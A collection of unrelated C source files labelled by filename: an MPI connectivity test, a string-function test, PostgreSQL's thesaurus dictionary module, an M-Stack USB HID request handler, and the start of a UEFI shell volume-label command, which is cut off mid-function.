/* * Copyright (c) 2007 Sun Microsystems, Inc. All rights reserved. */ /* * Test the connectivity between all processes. */ #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <unistd.h> #include <mpi.h> int main(int argc, char **argv) { MPI_Status status; int verbose = 0; int rank; int np; /* number of processes in job */ int peer; int i; int j; int length; char name[MPI_MAX_PROCESSOR_NAME+1]; MPI_Init(&argc, &argv); MPI_Comm_rank(MPI_COMM_WORLD, &rank); MPI_Comm_size(MPI_COMM_WORLD, &np); /* * If we cannot get the name for whatever reason, just * set it to unknown. */ if (MPI_SUCCESS != MPI_Get_processor_name(name, &length)) { strcpy(name, "unknown"); } if (argc>1 && strcmp(argv[1], "-v")==0) verbose = 1; for (i=0; i<np; i++) { if (rank==i) { /* rank i sends to and receives from each higher rank */ for(j=i+1; j<np; j++) { if (verbose) printf("checking connection between rank %d on %s and rank %-4d\n", i, name, j); MPI_Send(&rank, 1, MPI_INT, j, rank, MPI_COMM_WORLD); MPI_Recv(&peer, 1, MPI_INT, j, j, MPI_COMM_WORLD, &status); } } else if (rank>i) { /* receive from and reply to rank i */ MPI_Recv(&peer, 1, MPI_INT, i, i, MPI_COMM_WORLD, &status); MPI_Send(&rank, 1, MPI_INT, i, rank, MPI_COMM_WORLD); } } MPI_Barrier(MPI_COMM_WORLD); if (rank==0) printf("Connectivity test on %d processes PASSED.\n", np); MPI_Finalize(); return 0; }
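/*
 * Typical build/run (assuming an MPI toolchain is installed):
 *
 *   mpicc -o connectivity 564222.c
 *   mpirun -np 4 ./connectivity -v
 *
 * Each rank i exchanges one MPI_INT with every higher rank, so a hang or
 * error here points at a broken link between a specific pair of hosts;
 * on success rank 0 prints "Connectivity test on 4 processes PASSED."
 */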
13252.c
#include <stdio.h> int ft_str_is_uppercase(char *str); int main(void) { int flag; char *t; t = ""; flag = ft_str_is_uppercase(t); printf("%d\n", flag); return (0); }
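/*
 * The test above only declares ft_str_is_uppercase(); the definition lives
 * in another file. A minimal sketch consistent with the test: return 1 when
 * the string contains only 'A'..'Z', 0 otherwise. By the usual convention
 * for this exercise the empty string also yields 1 -- an assumption here.
 */
int ft_str_is_uppercase(char *str)
{
	while (*str)
	{
		if (*str < 'A' || *str > 'Z')
			return (0);
		str++;
	}
	return (1);
}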
198977.c
/*------------------------------------------------------------------------- * * dict_thesaurus.c * Thesaurus dictionary: phrase to phrase substitution * * Portions Copyright (c) 1996-2017, PostgreSQL Global Development Group * * * IDENTIFICATION * src/backend/tsearch/dict_thesaurus.c * *------------------------------------------------------------------------- */ #include "postgres.h" #include "catalog/namespace.h" #include "commands/defrem.h" #include "tsearch/ts_cache.h" #include "tsearch/ts_locale.h" #include "tsearch/ts_utils.h" #include "utils/builtins.h" #include "utils/regproc.h" /* * Temporay we use TSLexeme.flags for inner use... */ #define DT_USEASIS 0x1000 typedef struct LexemeInfo { uint32 idsubst; /* entry's number in DictThesaurus->subst */ uint16 posinsubst; /* pos info in entry */ uint16 tnvariant; /* total num lexemes in one variant */ struct LexemeInfo *nextentry; struct LexemeInfo *nextvariant; } LexemeInfo; typedef struct { char *lexeme; LexemeInfo *entries; } TheLexeme; typedef struct { uint16 lastlexeme; /* number lexemes to substitute */ uint16 reslen; TSLexeme *res; /* prepared substituted result */ } TheSubstitute; typedef struct { /* subdictionary to normalize lexemes */ Oid subdictOid; TSDictionaryCacheEntry *subdict; /* Array to search lexeme by exact match */ TheLexeme *wrds; int nwrds; /* current number of words */ int ntwrds; /* allocated array length */ /* * Storage of substituted result, n-th element is for n-th expression */ TheSubstitute *subst; int nsubst; } DictThesaurus; static void newLexeme(DictThesaurus *d, char *b, char *e, uint32 idsubst, uint16 posinsubst) { TheLexeme *ptr; if (d->nwrds >= d->ntwrds) { if (d->ntwrds == 0) { d->ntwrds = 16; d->wrds = (TheLexeme *) palloc(sizeof(TheLexeme) * d->ntwrds); } else { d->ntwrds *= 2; d->wrds = (TheLexeme *) repalloc(d->wrds, sizeof(TheLexeme) * d->ntwrds); } } ptr = d->wrds + d->nwrds; d->nwrds++; ptr->lexeme = palloc(e - b + 1); memcpy(ptr->lexeme, b, e - b); ptr->lexeme[e - b] = '\0'; ptr->entries = (LexemeInfo *) palloc(sizeof(LexemeInfo)); ptr->entries->nextentry = NULL; ptr->entries->idsubst = idsubst; ptr->entries->posinsubst = posinsubst; } static void addWrd(DictThesaurus *d, char *b, char *e, uint32 idsubst, uint16 nwrd, uint16 posinsubst, bool useasis) { static int nres = 0; static int ntres = 0; TheSubstitute *ptr; if (nwrd == 0) { nres = ntres = 0; if (idsubst >= d->nsubst) { if (d->nsubst == 0) { d->nsubst = 16; d->subst = (TheSubstitute *) palloc(sizeof(TheSubstitute) * d->nsubst); } else { d->nsubst *= 2; d->subst = (TheSubstitute *) repalloc(d->subst, sizeof(TheSubstitute) * d->nsubst); } } } ptr = d->subst + idsubst; ptr->lastlexeme = posinsubst - 1; if (nres + 1 >= ntres) { if (ntres == 0) { ntres = 2; ptr->res = (TSLexeme *) palloc(sizeof(TSLexeme) * ntres); } else { ntres *= 2; ptr->res = (TSLexeme *) repalloc(ptr->res, sizeof(TSLexeme) * ntres); } } ptr->res[nres].lexeme = palloc(e - b + 1); memcpy(ptr->res[nres].lexeme, b, e - b); ptr->res[nres].lexeme[e - b] = '\0'; ptr->res[nres].nvariant = nwrd; if (useasis) ptr->res[nres].flags = DT_USEASIS; else ptr->res[nres].flags = 0; ptr->res[++nres].lexeme = NULL; } #define TR_WAITLEX 1 #define TR_INLEX 2 #define TR_WAITSUBS 3 #define TR_INSUBS 4 static void thesaurusRead(char *filename, DictThesaurus *d) { tsearch_readline_state trst; uint32 idsubst = 0; bool useasis = false; char *line; filename = get_tsearch_config_filename(filename, "ths"); if (!tsearch_readline_begin(&trst, filename)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), 
errmsg("could not open thesaurus file \"%s\": %m", filename))); while ((line = tsearch_readline(&trst)) != NULL) { char *ptr; int state = TR_WAITLEX; char *beginwrd = NULL; uint32 posinsubst = 0; uint32 nwrd = 0; ptr = line; /* is it a comment? */ while (*ptr && t_isspace(ptr)) ptr += pg_mblen(ptr); if (t_iseq(ptr, '#') || *ptr == '\0' || t_iseq(ptr, '\n') || t_iseq(ptr, '\r')) { pfree(line); continue; } while (*ptr) { if (state == TR_WAITLEX) { if (t_iseq(ptr, ':')) { if (posinsubst == 0) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected delimiter"))); state = TR_WAITSUBS; } else if (!t_isspace(ptr)) { beginwrd = ptr; state = TR_INLEX; } } else if (state == TR_INLEX) { if (t_iseq(ptr, ':')) { newLexeme(d, beginwrd, ptr, idsubst, posinsubst++); state = TR_WAITSUBS; } else if (t_isspace(ptr)) { newLexeme(d, beginwrd, ptr, idsubst, posinsubst++); state = TR_WAITLEX; } } else if (state == TR_WAITSUBS) { if (t_iseq(ptr, '*')) { useasis = true; state = TR_INSUBS; beginwrd = ptr + pg_mblen(ptr); } else if (t_iseq(ptr, '\\')) { useasis = false; state = TR_INSUBS; beginwrd = ptr + pg_mblen(ptr); } else if (!t_isspace(ptr)) { useasis = false; beginwrd = ptr; state = TR_INSUBS; } } else if (state == TR_INSUBS) { if (t_isspace(ptr)) { if (ptr == beginwrd) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line or lexeme"))); addWrd(d, beginwrd, ptr, idsubst, nwrd++, posinsubst, useasis); state = TR_WAITSUBS; } } else elog(ERROR, "unrecognized thesaurus state: %d", state); ptr += pg_mblen(ptr); } if (state == TR_INSUBS) { if (ptr == beginwrd) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line or lexeme"))); addWrd(d, beginwrd, ptr, idsubst, nwrd++, posinsubst, useasis); } idsubst++; if (!(nwrd && posinsubst)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("unexpected end of line"))); /* * Note: currently, tsearch_readline can't return lines exceeding 4KB, * so overflow of the word counts is impossible. But that may not * always be true, so let's check. */ if (nwrd != (uint16) nwrd || posinsubst != (uint16) posinsubst) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("too many lexemes in thesaurus entry"))); pfree(line); } d->nsubst = idsubst; tsearch_readline_end(&trst); } static TheLexeme * addCompiledLexeme(TheLexeme *newwrds, int *nnw, int *tnm, TSLexeme *lexeme, LexemeInfo *src, uint16 tnvariant) { if (*nnw >= *tnm) { *tnm *= 2; newwrds = (TheLexeme *) repalloc(newwrds, sizeof(TheLexeme) * *tnm); } newwrds[*nnw].entries = (LexemeInfo *) palloc(sizeof(LexemeInfo)); if (lexeme && lexeme->lexeme) { newwrds[*nnw].lexeme = pstrdup(lexeme->lexeme); newwrds[*nnw].entries->tnvariant = tnvariant; } else { newwrds[*nnw].lexeme = NULL; newwrds[*nnw].entries->tnvariant = 1; } newwrds[*nnw].entries->idsubst = src->idsubst; newwrds[*nnw].entries->posinsubst = src->posinsubst; newwrds[*nnw].entries->nextentry = NULL; (*nnw)++; return newwrds; } static int cmpLexemeInfo(LexemeInfo *a, LexemeInfo *b) { if (a == NULL || b == NULL) return 0; if (a->idsubst == b->idsubst) { if (a->posinsubst == b->posinsubst) { if (a->tnvariant == b->tnvariant) return 0; return (a->tnvariant > b->tnvariant) ? 1 : -1; } return (a->posinsubst > b->posinsubst) ? 1 : -1; } return (a->idsubst > b->idsubst) ? 
1 : -1; } static int cmpLexeme(const TheLexeme *a, const TheLexeme *b) { if (a->lexeme == NULL) { if (b->lexeme == NULL) return 0; else return 1; } else if (b->lexeme == NULL) return -1; return strcmp(a->lexeme, b->lexeme); } static int cmpLexemeQ(const void *a, const void *b) { return cmpLexeme((const TheLexeme *) a, (const TheLexeme *) b); } static int cmpTheLexeme(const void *a, const void *b) { const TheLexeme *la = (const TheLexeme *) a; const TheLexeme *lb = (const TheLexeme *) b; int res; if ((res = cmpLexeme(la, lb)) != 0) return res; return -cmpLexemeInfo(la->entries, lb->entries); } static void compileTheLexeme(DictThesaurus *d) { int i, nnw = 0, tnm = 16; TheLexeme *newwrds = (TheLexeme *) palloc(sizeof(TheLexeme) * tnm), *ptrwrds; for (i = 0; i < d->nwrds; i++) { TSLexeme *ptr; if (strcmp(d->wrds[i].lexeme, "?") == 0) /* Is stop word marker? */ newwrds = addCompiledLexeme(newwrds, &nnw, &tnm, NULL, d->wrds[i].entries, 0); else { ptr = (TSLexeme *) DatumGetPointer(FunctionCall4(&(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PointerGetDatum(d->wrds[i].lexeme), Int32GetDatum(strlen(d->wrds[i].lexeme)), PointerGetDatum(NULL))); if (!ptr) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus sample word \"%s\" isn't recognized by subdictionary (rule %d)", d->wrds[i].lexeme, d->wrds[i].entries->idsubst + 1))); else if (!(ptr->lexeme)) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus sample word \"%s\" is a stop word (rule %d)", d->wrds[i].lexeme, d->wrds[i].entries->idsubst + 1), errhint("Use \"?\" to represent a stop word within a sample phrase."))); else { while (ptr->lexeme) { TSLexeme *remptr = ptr + 1; int tnvar = 1; int curvar = ptr->nvariant; /* compute n words in one variant */ while (remptr->lexeme) { if (remptr->nvariant != (remptr - 1)->nvariant) break; tnvar++; remptr++; } remptr = ptr; while (remptr->lexeme && remptr->nvariant == curvar) { newwrds = addCompiledLexeme(newwrds, &nnw, &tnm, remptr, d->wrds[i].entries, tnvar); remptr++; } ptr = remptr; } } } pfree(d->wrds[i].lexeme); pfree(d->wrds[i].entries); } if (d->wrds) pfree(d->wrds); d->wrds = newwrds; d->nwrds = nnw; d->ntwrds = tnm; if (d->nwrds > 1) { qsort(d->wrds, d->nwrds, sizeof(TheLexeme), cmpTheLexeme); /* uniq */ newwrds = d->wrds; ptrwrds = d->wrds + 1; while (ptrwrds - d->wrds < d->nwrds) { if (cmpLexeme(ptrwrds, newwrds) == 0) { if (cmpLexemeInfo(ptrwrds->entries, newwrds->entries)) { ptrwrds->entries->nextentry = newwrds->entries; newwrds->entries = ptrwrds->entries; } else pfree(ptrwrds->entries); if (ptrwrds->lexeme) pfree(ptrwrds->lexeme); } else { newwrds++; *newwrds = *ptrwrds; } ptrwrds++; } d->nwrds = newwrds - d->wrds + 1; d->wrds = (TheLexeme *) repalloc(d->wrds, sizeof(TheLexeme) * d->nwrds); } } static void compileTheSubstitute(DictThesaurus *d) { int i; for (i = 0; i < d->nsubst; i++) { TSLexeme *rem = d->subst[i].res, *outptr, *inptr; int n = 2; outptr = d->subst[i].res = (TSLexeme *) palloc(sizeof(TSLexeme) * n); outptr->lexeme = NULL; inptr = rem; while (inptr && inptr->lexeme) { TSLexeme *lexized, tmplex[2]; if (inptr->flags & DT_USEASIS) { /* do not lexize */ tmplex[0] = *inptr; tmplex[0].flags = 0; tmplex[1].lexeme = NULL; lexized = tmplex; } else { lexized = (TSLexeme *) DatumGetPointer( FunctionCall4( &(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PointerGetDatum(inptr->lexeme), Int32GetDatum(strlen(inptr->lexeme)), PointerGetDatum(NULL) ) ); } if (lexized && lexized->lexeme) { int toset = (lexized->lexeme && outptr != 
d->subst[i].res) ? (outptr - d->subst[i].res) : -1; while (lexized->lexeme) { if (outptr - d->subst[i].res + 1 >= n) { int diff = outptr - d->subst[i].res; n *= 2; d->subst[i].res = (TSLexeme *) repalloc(d->subst[i].res, sizeof(TSLexeme) * n); outptr = d->subst[i].res + diff; } *outptr = *lexized; outptr->lexeme = pstrdup(lexized->lexeme); outptr++; lexized++; } if (toset > 0) d->subst[i].res[toset].flags |= TSL_ADDPOS; } else if (lexized) { ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute word \"%s\" is a stop word (rule %d)", inptr->lexeme, i + 1))); } else { ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute word \"%s\" isn't recognized by subdictionary (rule %d)", inptr->lexeme, i + 1))); } if (inptr->lexeme) pfree(inptr->lexeme); inptr++; } if (outptr == d->subst[i].res) ereport(ERROR, (errcode(ERRCODE_CONFIG_FILE_ERROR), errmsg("thesaurus substitute phrase is empty (rule %d)", i + 1))); d->subst[i].reslen = outptr - d->subst[i].res; pfree(rem); } } Datum thesaurus_init(PG_FUNCTION_ARGS) { List *dictoptions = (List *) PG_GETARG_POINTER(0); DictThesaurus *d; char *subdictname = NULL; bool fileloaded = false; ListCell *l; d = (DictThesaurus *) palloc0(sizeof(DictThesaurus)); foreach(l, dictoptions) { DefElem *defel = (DefElem *) lfirst(l); if (pg_strcasecmp("DictFile", defel->defname) == 0) { if (fileloaded) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("multiple DictFile parameters"))); thesaurusRead(defGetString(defel), d); fileloaded = true; } else if (pg_strcasecmp("Dictionary", defel->defname) == 0) { if (subdictname) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("multiple Dictionary parameters"))); subdictname = pstrdup(defGetString(defel)); } else { ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("unrecognized Thesaurus parameter: \"%s\"", defel->defname))); } } if (!fileloaded) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("missing DictFile parameter"))); if (!subdictname) ereport(ERROR, (errcode(ERRCODE_INVALID_PARAMETER_VALUE), errmsg("missing Dictionary parameter"))); d->subdictOid = get_ts_dict_oid(stringToQualifiedNameList(subdictname), false); d->subdict = lookup_ts_dictionary_cache(d->subdictOid); compileTheLexeme(d); compileTheSubstitute(d); PG_RETURN_POINTER(d); } static LexemeInfo * findTheLexeme(DictThesaurus *d, char *lexeme) { TheLexeme key, *res; if (d->nwrds == 0) return NULL; key.lexeme = lexeme; key.entries = NULL; res = bsearch(&key, d->wrds, d->nwrds, sizeof(TheLexeme), cmpLexemeQ); if (res == NULL) return NULL; return res->entries; } static bool matchIdSubst(LexemeInfo *stored, uint32 idsubst) { bool res = true; if (stored) { res = false; for (; stored; stored = stored->nextvariant) if (stored->idsubst == idsubst) { res = true; break; } } return res; } static LexemeInfo * findVariant(LexemeInfo *in, LexemeInfo *stored, uint16 curpos, LexemeInfo **newin, int newn) { for (;;) { int i; LexemeInfo *ptr = newin[0]; for (i = 0; i < newn; i++) { while (newin[i] && newin[i]->idsubst < ptr->idsubst) newin[i] = newin[i]->nextentry; if (newin[i] == NULL) return in; if (newin[i]->idsubst > ptr->idsubst) { ptr = newin[i]; i = -1; continue; } while (newin[i]->idsubst == ptr->idsubst) { if (newin[i]->posinsubst == curpos && newin[i]->tnvariant == newn) { ptr = newin[i]; break; } newin[i] = newin[i]->nextentry; if (newin[i] == NULL) return in; } if (newin[i]->idsubst != ptr->idsubst) { ptr = newin[i]; i = -1; continue; } } if (i == newn && 
matchIdSubst(stored, ptr->idsubst) && (in == NULL || !matchIdSubst(in, ptr->idsubst))) { /* found */ ptr->nextvariant = in; in = ptr; } /* step forward */ for (i = 0; i < newn; i++) newin[i] = newin[i]->nextentry; } } static TSLexeme * copyTSLexeme(TheSubstitute *ts) { TSLexeme *res; uint16 i; res = (TSLexeme *) palloc(sizeof(TSLexeme) * (ts->reslen + 1)); for (i = 0; i < ts->reslen; i++) { res[i] = ts->res[i]; res[i].lexeme = pstrdup(ts->res[i].lexeme); } res[ts->reslen].lexeme = NULL; return res; } static TSLexeme * checkMatch(DictThesaurus *d, LexemeInfo *info, uint16 curpos, bool *moreres) { *moreres = false; while (info) { Assert(info->idsubst < d->nsubst); if (info->nextvariant) *moreres = true; if (d->subst[info->idsubst].lastlexeme == curpos) return copyTSLexeme(d->subst + info->idsubst); info = info->nextvariant; } return NULL; } Datum thesaurus_lexize(PG_FUNCTION_ARGS) { DictThesaurus *d = (DictThesaurus *) PG_GETARG_POINTER(0); DictSubState *dstate = (DictSubState *) PG_GETARG_POINTER(3); TSLexeme *res = NULL; LexemeInfo *stored, *info = NULL; uint16 curpos = 0; bool moreres = false; if (PG_NARGS() != 4 || dstate == NULL) elog(ERROR, "forbidden call of thesaurus or nested call"); if (dstate->isend) PG_RETURN_POINTER(NULL); stored = (LexemeInfo *) dstate->private_state; if (stored) curpos = stored->posinsubst + 1; if (!d->subdict->isvalid) d->subdict = lookup_ts_dictionary_cache(d->subdictOid); res = (TSLexeme *) DatumGetPointer(FunctionCall4(&(d->subdict->lexize), PointerGetDatum(d->subdict->dictData), PG_GETARG_DATUM(1), PG_GETARG_DATUM(2), PointerGetDatum(NULL))); if (res && res->lexeme) { TSLexeme *ptr = res, *basevar; while (ptr->lexeme) { uint16 nv = ptr->nvariant; uint16 i, nlex = 0; LexemeInfo **infos; basevar = ptr; while (ptr->lexeme && nv == ptr->nvariant) { nlex++; ptr++; } infos = (LexemeInfo **) palloc(sizeof(LexemeInfo *) * nlex); for (i = 0; i < nlex; i++) if ((infos[i] = findTheLexeme(d, basevar[i].lexeme)) == NULL) break; if (i < nlex) { /* no chance to find */ pfree(infos); continue; } info = findVariant(info, stored, curpos, infos, nlex); } } else if (res) { /* stop-word */ LexemeInfo *infos = findTheLexeme(d, NULL); info = findVariant(NULL, stored, curpos, &infos, 1); } else { info = NULL; /* word isn't recognized */ } dstate->private_state = (void *) info; if (!info) { dstate->getnext = false; PG_RETURN_POINTER(NULL); } if ((res = checkMatch(d, info, curpos, &moreres)) != NULL) { dstate->getnext = moreres; PG_RETURN_POINTER(res); } dstate->getnext = true; PG_RETURN_POINTER(NULL); }
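/*
 * For reference (not in the original source): the .ths files parsed by
 * thesaurusRead() above hold one rule per line -- sample lexemes, a colon,
 * then the substitute lexemes. Per the state machine and compileTheLexeme(),
 * "#" starts a comment, "?" stands for a stop word in the sample phrase, and
 * a leading "*" keeps a substitute word as-is (DT_USEASIS) instead of
 * passing it through the subdictionary. For example:
 *
 *   # comment line
 *   supernovae stars : sn
 *   one ? two        : 12
 *   foo bar          : *baz qux
 */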
137135.c
/* * M-Stack USB Device Stack Implementation * Copyright (C) 2013 Alan Ott <alan@signal11.us> * Copyright (C) 2013 Signal 11 Software * * Initial version for PIC18, 2008-02-24 * PIC24 port, 2013-08-13 * * M-Stack is free software: you can redistribute it and/or modify it under * the terms of the GNU Lesser General Public License as published by the * Free Software Foundation, version 3; or the Apache License, version 2.0 * as published by the Apache Software Foundation. If you have purchased a * commercial license for this software from Signal 11 Software, your * commerical license superceeds the information in this header. * * M-Stack is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public * License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this software. If not, see <http://www.gnu.org/licenses/>. * * You should have received a copy of the Apache License, verion 2.0 along * with this software. If not, see <http://www.apache.org/licenses/>. */ #include <usb_config.h> #include <usb_ch9.h> #include <usb.h> #include <usb_hid.h> #define MIN(x,y) (((x)<(y))?(x):(y)) STATIC_SIZE_CHECK_EQUAL(sizeof(struct hid_descriptor), 9); STATIC_SIZE_CHECK_EQUAL(sizeof(struct hid_optional_descriptor), 3); #ifdef MULTI_CLASS_DEVICE static uint8_t *hid_interfaces; static uint8_t num_hid_interfaces; void hid_set_interface_list(uint8_t *interfaces, uint8_t num_interfaces) { hid_interfaces = interfaces; num_hid_interfaces = num_interfaces; } #endif uint8_t process_hid_setup_request(const struct setup_packet *setup) { /* The following comes from the HID spec 1.11, section 7.1.1 */ uint8_t interface = setup->wIndex; #ifdef MULTI_CLASS_DEVICE /* Check the interface first to make sure the destination is a * HID interface. Composite devices will need to call * hid_set_interface_list() first. */ uint8_t i; for (i = 0; i < num_hid_interfaces; i++) { if (interface == hid_interfaces[i]) break; } /* Return if interface is not in the list of HID interfaces. 
*/ if (i == num_hid_interfaces) return -1; #endif if (setup->bRequest == GET_DESCRIPTOR && setup->REQUEST.bmRequestType == 0x81) { uint8_t descriptor = ((setup->wValue >> 8) & 0x00ff); const void *desc; int16_t len = -1; if (descriptor == DESC_HID) { len = USB_HID_DESCRIPTOR_FUNC(interface, &desc); } else if (descriptor == DESC_REPORT) { len = USB_HID_REPORT_DESCRIPTOR_FUNC(interface, &desc); } #ifdef USB_HID_PHYSICAL_DESCRIPTOR_FUNC else if (descriptor == DESC_PHYSICAL) { uint8_t descriptor_index = setup->wValue & 0x00ff; len = USB_HID_PHYSICAL_DESCRIPTOR_FUNC(interface, descriptor_index, &desc); } #endif if (len < 0) return -1; usb_send_data_stage((void*) desc, min(len, setup->wLength), NULL, NULL); return 0; } /* No support for Set_Descriptor */ #ifdef HID_GET_REPORT_CALLBACK const void *desc; int16_t len = -1; usb_ep0_data_stage_callback callback; void *context; if (setup->bRequest == HID_GET_REPORT && setup->REQUEST.bmRequestType == 0xa1) { uint8_t report_type = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; len = HID_GET_REPORT_CALLBACK(interface/*interface*/, report_type, report_id, &desc, &callback, &context); if (len < 0) return -1; usb_send_data_stage((void*)desc, min(len, setup->wLength), callback, context); return 0; } #endif #ifdef HID_SET_REPORT_CALLBACK if (setup->bRequest == HID_SET_REPORT && setup->REQUEST.bmRequestType == 0x21) { uint8_t report_type = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; int8_t res = HID_SET_REPORT_CALLBACK(interface, report_type, report_id); return res; } #endif #ifdef HID_GET_IDLE_CALLBACK if (setup->bRequest == HID_GET_IDLE && setup->REQUEST.bmRequestType == 0xa1) { uint8_t report_id = setup->wValue & 0x00ff; uint8_t res = HID_GET_IDLE_CALLBACK(interface, report_id); usb_send_data_stage((char*)&res, 1, NULL, NULL); return 0; } #endif #ifdef HID_SET_IDLE_CALLBACK if (setup->bRequest == HID_SET_IDLE && setup->REQUEST.bmRequestType == 0x21) { uint8_t duration = (setup->wValue >> 8) & 0x00ff; uint8_t report_id = setup->wValue & 0x00ff; uint8_t res = HID_SET_IDLE_CALLBACK(interface, report_id, duration); return res; } #endif #ifdef HID_GET_PROTOCOL_CALLBACK if (setup->bRequest == HID_GET_PROTOCOL && setup->REQUEST.bmRequestType == 0xa1) { int8_t res = HID_GET_PROTOCOL_CALLBACK(interface); if (res < 0) return -1; usb_send_data_stage((char*)&res, 1, NULL, NULL); return 0; } #endif #ifdef HID_SET_PROTOCOL_CALLBACK if (setup->bRequest == HID_SET_PROTOCOL && setup->REQUEST.bmRequestType == 0x21) { int8_t res = HID_SET_PROTOCOL_CALLBACK(interface, setup->wValue); return res; } #endif return -1; }
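/*
 * Usage sketch (not part of M-Stack itself): usb_config.h points
 * USB_HID_REPORT_DESCRIPTOR_FUNC at an application callback shaped like
 * the one below, which hands back a pointer to a const descriptor and
 * returns its length. The bytes shown are an example vendor-defined
 * 8-byte-in/8-byte-out report, not something this driver mandates.
 */
static const uint8_t example_report_descriptor[] = {
	0x06, 0x00, 0xff,   /* USAGE_PAGE (Vendor Defined 0xFF00) */
	0x09, 0x01,         /* USAGE (Vendor Usage 1) */
	0xa1, 0x01,         /* COLLECTION (Application) */
	0x15, 0x00,         /*   LOGICAL_MINIMUM (0) */
	0x26, 0xff, 0x00,   /*   LOGICAL_MAXIMUM (255) */
	0x75, 0x08,         /*   REPORT_SIZE (8) */
	0x95, 0x08,         /*   REPORT_COUNT (8) */
	0x09, 0x01,         /*   USAGE (Vendor Usage 1) */
	0x81, 0x02,         /*   INPUT (Data,Var,Abs) */
	0x09, 0x01,         /*   USAGE (Vendor Usage 1) */
	0x91, 0x02,         /*   OUTPUT (Data,Var,Abs) */
	0xc0                /* END_COLLECTION */
};

static int16_t example_report_descriptor_func(uint8_t interface,
                                              const void **ptr)
{
	(void) interface;   /* single-interface device in this sketch */
	*ptr = example_report_descriptor;
	return sizeof(example_report_descriptor);
}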
110673.c
/** @file Main file for vol shell level 2 function. (C) Copyright 2015 Hewlett-Packard Development Company, L.P.<BR> Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR> This program and the accompanying materials are licensed and made available under the terms and conditions of the BSD License which accompanies this distribution. The full text of the license may be found at http://opensource.org/licenses/bsd-license.php THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. **/ #include "UefiShellLevel2CommandsLib.h" #include <Guid/FileSystemInfo.h> #include <Guid/FileSystemVolumeLabelInfo.h> /** Print the info or change the volume info. @param[in] Path String with starting path. @param[in] Delete TRUE to delete the volume label. FALSE otherwise. @param[in] Name New name to set to the volume label. @retval SHELL_SUCCESS The operation was sucessful. **/ SHELL_STATUS HandleVol( IN CONST CHAR16 *Path, IN CONST BOOLEAN Delete, IN CONST CHAR16 *Name OPTIONAL ) { EFI_STATUS Status; SHELL_STATUS ShellStatus; EFI_FILE_SYSTEM_INFO *SysInfo; UINTN SysInfoSize; SHELL_FILE_HANDLE ShellFileHandle; EFI_FILE_PROTOCOL *EfiFpHandle; UINTN Size1; UINTN Size2; ShellStatus = SHELL_SUCCESS; if ( Name != NULL && ( StrStr(Name, L"%") != NULL || StrStr(Name, L"^") != NULL || StrStr(Name, L"*") != NULL || StrStr(Name, L"+") != NULL || StrStr(Name, L"=") != NULL || StrStr(Name, L"[") != NULL || StrStr(Name, L"]") != NULL || StrStr(Name, L"|") != NULL || StrStr(Name, L":") != NULL || StrStr(Name, L";") != NULL || StrStr(Name, L"\"") != NULL || StrStr(Name, L"<") != NULL || StrStr(Name, L">") != NULL || StrStr(Name, L"?") != NULL || StrStr(Name, L"/") != NULL || StrStr(Name, L" ") != NULL ) ){ ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_PARAM_INV), gShellLevel2HiiHandle, L"vol", Name); return (SHELL_INVALID_PARAMETER); } Status = gEfiShellProtocol->OpenFileByName( Path, &ShellFileHandle, Name != NULL?EFI_FILE_MODE_READ|EFI_FILE_MODE_WRITE:EFI_FILE_MODE_READ); if (EFI_ERROR(Status) || ShellFileHandle == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_FILE_OPEN_FAIL), gShellLevel2HiiHandle, L"vol", Path); return (SHELL_ACCESS_DENIED); } // // Get the Volume Info from ShellFileHandle // SysInfo = NULL; SysInfoSize = 0; EfiFpHandle = ConvertShellHandleToEfiFileProtocol(ShellFileHandle); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); if (Status == EFI_BUFFER_TOO_SMALL) { SysInfo = AllocateZeroPool(SysInfoSize); Status = EfiFpHandle->GetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, &SysInfoSize, SysInfo); } ASSERT(SysInfo != NULL); if (Delete) { *((CHAR16 *) SysInfo->VolumeLabel) = CHAR_NULL; SysInfo->Size = SIZE_OF_EFI_FILE_SYSTEM_INFO + StrSize(SysInfo->VolumeLabel); Status = EfiFpHandle->SetInfo( EfiFpHandle, &gEfiFileSystemInfoGuid, (UINTN)SysInfo->Size, SysInfo); } else if (Name != NULL) { Size1 = StrSize(Name); Size2 = StrSize(SysInfo->VolumeLabel); if (Size1 > Size2) { SysInfo = ReallocatePool((UINTN)SysInfo->Size, (UINTN)SysInfo->Size + Size1 - Size2, SysInfo); if (SysInfo == NULL) { ShellPrintHiiEx(-1, -1, NULL, STRING_TOKEN (STR_GEN_OUT_MEM), gShellLevel2HiiHandle, 